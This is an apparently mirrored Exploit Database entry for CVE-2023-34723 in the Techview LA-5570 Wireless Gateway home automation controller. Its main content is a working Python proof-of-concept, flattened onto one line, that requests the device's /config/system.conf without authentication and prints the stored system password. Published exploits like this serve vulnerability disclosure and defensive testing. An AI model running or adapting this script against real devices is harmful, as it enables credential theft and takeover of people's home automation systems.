Techview LA-5570 Wireless Gateway Home Automation Controller – Multiple Vulnerabilities

• Exploit Database
• 114 阅读

• 作者： The Security Team [exploitsecurity.io]
  日期： 2023-09-08
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51720/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78

  # Exploit Title: Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities # Google Dork: N/A # Date: 25/08/2023 # Exploit Author: The Security Team [exploitsecurity.io<http://exploitsecurity.io>] # Vendor Homepage: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570 # Software Link: N/A # Version: 1.0.19_T53 # Tested on: MACOS/Linux # CVE : CVE-2023-34723 # POC Code Available: https://www.exploitsecurity.io/post/cve-2023-34723-cve-2023-34724-cve-2023-34725   #!/opt/homebrew/bin/python3   import requests import sys from time import sleep from urllib3.exceptions import InsecureRequestWarning from colorama import init from colorama import Fore, Back, Style import re import os import ipaddress requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)   def banner(): if os.name == &apos;posix&apos;: clr_cmd = (&apos;clear&apos;) elif os.name == &apos;nt&apos;: clr_cmd = (&apos;cls&apos;) os.system(clr_cmd) print ("[+]****************************************************[+]") print (" | Author: The Security Team|") print (" | Company : "+Fore.RED+ "Exploit Security" +Style.RESET_ALL+"\t\t\t|") print (" | Description : TechVIEW LA-5570 Directory Traversal |") print (" | Usage : "+sys.argv[0]+" <target>|") print ("[+]****************************************************[+]")   def usage(): print (f"Usage: {sys.argv[0]} <target>")   def main(target): domain = "http://"+target+"/config/system.conf" try: url = domain.strip() r = requests.get(url, verify=False, timeout=3) print ("[+] Retrieving credentials", flush=True, end=&apos;&apos;) sleep(1) print(" .", flush=True, end=&apos;&apos;) sleep(1) print(" .", flush=True, end=&apos;&apos;) sleep(1) print(" .", flush=True, end=&apos;&apos;) if ("system_password" in r.text): data =(r.text.split("\n")) print (f"\n{data[1]}") else: print (Fore.RED + "[!] Target is not vulnerable !"+ Style.RESET_ALL) except TimeoutError: print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL) except KeyboardInterrupt: return except requests.exceptions.Timeout: print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL) return   if __name__ == &apos;__main__&apos;: if len(sys.argv)>1: banner() target = sys.argv[1] try: validate = ipaddress.ip_address(target) if (validate): main (target) except ValueError as e: print (Fore.RED + "[!] " + str(e) + " !" + Style.RESET_ALL) else: print (Fore.RED + f"[+] Not enough arguments, please specify target !" + Style.RESET_ALL)